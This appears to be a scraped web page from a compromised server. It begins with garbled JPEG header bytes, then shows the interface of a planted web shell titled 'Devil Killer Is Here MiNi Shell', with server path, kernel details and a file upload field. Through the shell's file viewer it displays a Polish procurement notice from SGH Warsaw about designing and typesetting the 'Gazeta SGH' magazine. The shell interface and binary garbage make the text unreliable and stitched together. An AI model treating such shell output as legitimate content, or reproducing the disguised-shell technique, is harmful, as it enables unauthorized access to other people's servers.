JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250204/0008846901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie graficzne, skład i przygotowanie do druku czasopisma „Gazeta SGH” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZKOŁA GŁÓWNA HANDLOWA W WARSZAWIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Podmiot należący do grupy VAT o nazwie Szkoła Główna Handlowa Grupa VAT w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001502</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Niepodległości 162</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-554</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">coz@sgh.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sgh.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie graficzne, skład i przygotowanie do druku czasopisma „Gazeta SGH” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b3e57ffe-6c32-4570-9fd2-2142301cacb2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00088469</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sgh.eb2b.com.pl/open-preview-auction.html/464294 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sgh.eb2b.com.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy Zakupowej (dalej jako „Platforma” lub „Platforma Zakupowa”) dostępnej pod adresem: https://sgh.eb2b.com.pl.<br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie wnioski, zawiadomienia, informacje oraz pozostałe dokumenty i oświadczenia, w tym dokumenty i oświadczenia składane na wezwanie Zamawiającego, przekazywane są w formie elektronicznej za pośrednictwem elektronicznej Platformy Zakupowej dostępnej pod adresem: https://sgh.eb2b.com.pl poprzez zakładkę „Pytania / Informacje” lub za pośrednictwem poczty elektronicznej, e-mail coz@sgh.waw.pl, przy czym Zamawiający nie dopuszcza składania ofert za pośrednictwem poczty elektronicznej. 3. Osobą uprawnioną przez Zamawiającego do kontaktu z Wykonawcami jest: Katarzyna Wojtyńska, email: coz@sgh.waw.pl lub inna osoba zastępująca. 4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w Platformie Zakupowej, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie internetowej https://sgh.eb2b.com.pl/. 5. Zamawiający, zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452; dalej jako „Rozporządzenie”) określa dopuszczalny format kwalifikowanego podpisu elektronicznego jako: 1) dokumenty w formacie „pdf” należy podpisywać formatem PAdES; 2) Zamawiający dopuszcza podpisanie dokumentów w formacie innym niż „pdf”, wtedy należy użyć formatu XAdES.<br/>6. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 250 MB w formatach: .pdf a w przypadku dokumentów podpisanych podpisem zaufanym do 10 MB. 7. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia, określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>1) plik załączony przez Wykonawcę na Platformie i zapisany, nie jest widoczny dla Zamawiającego oraz właściciela Platformy, gdyż istnieje w systemie jako zaszyfrowany. Możliwość otworzenia pliku dostępne jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert,<br/>2) oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”.<br/>8. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy w zakładce „Pytania/ Informacje” poprzez polecenie „Dodaj pytanie / komentarz” lub za pośrednictwem poczty e-mail: coz@sgh.waw.pl. Wyjaśnianie treści SWZ oraz jej ewentualna zmiana odbywać się będą zgodnie z art. 284 Ustawy.<br/>9. Zaleca się, aby Wykonawca na bieżąco śledził (sugerujemy codziennie) zmiany jakich w trakcie postępowania może dokonać Zamawiający. Zalecenie dotyczy również informacji jakie Zamawiający kieruje do Wykonawców po zakończeniu składania ofert.<br/>10. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu, w tym zwrotu kosztów poniesionych z tytułu nabycia kwalifikowanego podpisu elektronicznego.<br/>11. Korzystanie z Platformy przez wykonawcę jest bezpłatne.<br/>12. Z uwagi na ograniczoną liczbę znaków szczegółowe informacje zawarte zostały w rozdziale IX Specyfikacji Warunków Zamówienia oraz w zakładce &#34;Pomoc&#34; Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o zasadach przetwarzania danych osobowych przez Szkołę Główną Handlową w Warszawie, określone zostały w Rozdziale XXIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja o zasadach przetwarzania danych osobowych przez Szkołę Główną Handlową w Warszawie, określone zostały w Rozdziale XXIII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ACOZ.25.1.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest opracowanie graficzne, skład i przygotowanie do druku czasopisma „Gazeta SGH. Pismo Szkoły Głównej Handlowej w Warszawie (ISSN 1644-2237)”, tj.:<br/>1)	opracowanie graficzne, skład i łamanie czasopisma zgodnie z layoutem czasopisma „Gazeta SGH” wypracowanym w trzech ostatnich numerach Gazety SGH (Insight 2024/2025, jesień 2024, lato 2024). Numery te, w wersji PDF dostępne są na: https://gazeta.sgh.waw.pl/archiwum; <br/>2)	przygotowanie autorskiego projektu grafiki okładki czasopisma związanego <br/>z tematem numeru/tematem z okładki oraz związanych z grafiką okładkową ilustracji do artykułu (temat numeru) w konsultacji z Zamawiającym. Wykonawca zobowiązany jest każdorazowo do przedstawienia dwóch koncepcji/propozycji graficznych okładki oraz ilustracji do artykułu (tematu numeru);<br/>3)	przygotowanie autorskich ilustracji do przynajmniej czterech innych artykułów w każdym numerze drukowanym w konsultacji z Zamawiającym.<br/>2.	Szczegółowy opis, zakres, warunki i sposób realizacji przedmiotu zamówienia określone zostały w Opisie przedmiotu zamówienia (dalej „OPZ”) stanowiącym Załącznik nr 2 do SWZ oraz we wzorze umowy (dalej „wzór umowy”), stanowiącym Załącznik nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79822500-7 - Usługi projektów graficznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-08-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. Zamawiający przewiduje udzielanie zamówień polegających na powtórzeniu podobnych usług na podstawie art. 214 ust. 1 pkt 7) Ustawy Pzp polegające na opracowaniu graficznym, składu i przygotowaniu do druku numeru czasopisma „Gazeta SGH”. Wartość udzielonych zamówień nie może przekroczyć 40 % wartości zamówienia podstawowego. . <br/>2. Podobne zamówienie może zostać udzielone w okresie 3 lat od dnia udzielenia zamówienia podstawowego, w trybie zamówienia z wolnej ręki, po wcześniejszym przeprowadzeniu negocjacji z Wykonawcą, w szczególności w zakresie warunków umowy, w tym ceny, terminu obowiązywania, harmonogramu realizacji przedmiotu zamówienia, czasu realizacji poszczególnych etapów, osób skierowanych do realizacji zamówienia, ich wykształcenia, kompetencji i doświadczenia oraz może obejmować swoim zakresem:<br/>1)	opracowanie graficzne, skład i łamanie czasopisma zgodnie z layoutem czasopisma „Gazeta SGH” wypracowanym w trzech ostatnich numerach Gazety SGH (Insight 2024/2025, jesień 2024, lato 2024);<br/>2)	przygotowanie autorskiego projektu grafiki okładki czasopisma związanego z tematem numeru/tematem z okładki oraz związanych z grafiką okładkową ilustracji do artykułu (temat numeru) w konsultacji z Zamawiającym. Wykonawca zobowiązany jest każdorazowo do przedstawienia trzech koncepcji/propozycji graficznych okładki oraz ilustracji do artykułu (tematu numeru);<br/>3)	przygotowanie autorskich ilustracji do przynajmniej pięciu innych artykułów w każdym numerze drukowanym w konsultacji z Zamawiającym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria:<br/>1) Cena (C) 60 %<br/>2) Jakość próbek czasopism (P) 20 %<br/>3) Jakość wykonanego zadania (J) 20 %<br/>2. Cena = cena brutto oferty z najniższą ceną / cena brutto oferty badanej x 60<br/>3. W kryterium „Jakość próbek czasopism” (P):<br/>1) W kryterium Zamawiający punktować będzie przedmiotowe środki dowodowe, o których mowa w rozdziale VI ust. 1 pkt 1) SWZ<br/>uszczegółowione w rozdziale VI ust. 2 - 3 SWZ.<br/>2) W przypadku przedstawienia większej liczby przykładów niż wymagana, np. w przypadku pliku zawierającego całe czasopismo, w przypadku gdy artykuł zawiera więcej niż 2 ilustracje, itp. – Wykonawca jest zobowiązany do odpowiedniego zaznaczenia, które przykłady wskazuje jako właściwe do oceny i przyznania punktów w ramach przedmiotowego kryterium oceny ofert. W przypadku gdy, Wykonawca wskażę więcej niż 2 ilustracje, itp. do oceny i przyznania punktów w ramach przedmiotowego kryterium oceny ofert otrzyma 0 punktów. W przypadku braku oznaczenia wskazującego, który przykład podlega ocenie, dany przykład nie zostanie uwzględniony i zostanie przyznanych 0 punktów.<br/>3) Punkty będą przyznawane według kryteriów jakościowych dotyczących składu tekstu i ilustracji graficznych opisanych szczegółowo w rozdziale XVII ust. 3 pkt 3) SWZ.<br/>4. W kryterium „Jakość wykonanego zadania” (J) Zamawiający przyzna punkty w poniżej podany sposób:<br/>Ocenie podlegać będą przekazane wraz z ofertą przedmiotowe środki dowodowe, o których mowa w rozdziale VI ust. 1 pkt 2) SWZ,<br/>tj. projekt grafiki wykonany zgodnie ze wskazanymi w załączniku nr 8 do SWZ wytycznymi, jako plik produkcyjny w formacie PDF – maksymalnie do 20 pkt., zgodnie z podkryteriami opisanymi szczegółowo w rozdziale XVII ust. 4 SWZ.<br/>5. Ze względu na ograniczoną liczbę znaków szczegółowe uregulowania znajdują się w rozdziale XVII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość próbek czasopism (P)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość wykonanego zadania (J)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich 3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie a w przypadku świadczeń okresowych wykonuje co najmniej 2 usługi (1 usługa rozumiana jako jedna umowa/zamówienie), z których każda polegała na składzie i opracowaniu graficznym, w tym opracowywaniu plików w grafice rastrowej oraz wektorowej, w pełnym kolorze (Adobe inDesign, Photoshop, Adobe Illustrator) czasopism o objętości minimum 92 stron środka + 4 stron okładki.<br/>UWAGA I – Za czasopismo Zamawiający uważa publikację o charakterze ciągłym posiadającą ISSN, ukazującą się drukiem lub w PDF co najmniej 4 razy w roku i mającą objętość co najmniej 92 stron środka oraz 4 strony okładki.<br/>UWAGA II – Zamawiający przez wykonanie jednej usługi rozumie skład i opracowanie graficzne jednego tytułu/czasopisma posiadającego swój numer ISSN. Jedna usługa to jeden numer ISSN.<br/>b)	skieruje do realizacji zamówienia co najmniej 3 osoby o doświadczeniu odpowiednim do realizacji przedmiotu zamówienia, w szczególności:<br/>b1) 2 osoby dedykowane do składu i przygotowania do druku, każda legitymująca się:<br/>- bardzo dobrą znajomością programów z pakietu Adobe: InDesign, Photoshop, Illustrator;<br/>- bardzo dobrą znajomością rozszerzonej wersji programu Acrobat (edycja plików, konwersja, korekta); <br/>- znajomością zasad składu i łamania czasopism zgodnie z zasadami składu i łamania tekstów w języku polskim i zasadami składu i łamania tekstów w języku angielskim;<br/>- umiejętnością projektowania czasopism;<br/>- umiejętnym i zgodnym z zasadami łączeniem tekstu z grafiką;<br/>- umiejętnością wykonywania rysunków, tabel, wzorów;<br/>- znajomością zasad redakcji technicznej;<br/>- umiejętnością odczytywania znaków korektorskich i posługiwania się nimi;<br/>- znajomością zasad typografii i technologii poligraficznych;<br/>- umiejętnością przygotowania materiałów składowych do druku i gruntowaną wiedzą na temat różnych technik druku;<br/>- znajomością zasad i praktyczną umiejętnością konwersji i zapisu w formatach przeznaczonych do internetu;<br/>- niezbędnym doświadczeniem na stanowisku operatora DTP/redaktora technicznego z co najmniej 3-letnim doświadczeniem w okresie ostatnich 5 lat liczonych do upływu terminu składania ofert.<br/>b2) 1 osobę posiadającą co najmniej 3-letnie doświadczenie przy wykonywaniu projektów graficznych i ilustracji do czasopism w okresie ostatnich 5 lat liczonych od terminu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2)	Wykonawca na wezwanie Zamawiającego winien złożyć za pośrednictwem Platformy poprzez zakładkę „Pytania/Informacje” lub za pośrednictwem poczty elektronicznej na adres e-mail: coz@sgh.waw.pl następujące dokumenty w celu potwierdzenia braku podstaw wykluczenia:<br/>a)	oświadczenie, w zakresie art. 108 ust. 1 pkt 5) Ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ,<br/>b)	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji – w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 Ustawy Pzp*,<br/>* wskazany termin 3 miesięcy określony został w § 2 ust. 1 pkt 6 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy<br/>c)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa rozdziale XV ust. 1 pkt 1), w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 pkt 3) – 6) Ustawy Pzp oraz art. 109 ust. 1 pkt 5), 7), 8), 9) i 10) Ustawy Pzp – Załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7)	Wykonawca na wezwanie Zamawiającego winien złożyć za pośrednictwem Platformy poprzez zakładkę „Pytania/Informacje” lub za pośrednictwem poczty elektronicznej na adres e-mail: coz@sgh.waw.pl następujące dokumenty, w celu potwierdzenia spełniania warunków udziału w postępowaniu: <br/>a)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się są wykonywane, a jeżeli Wykonawca <br/>z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 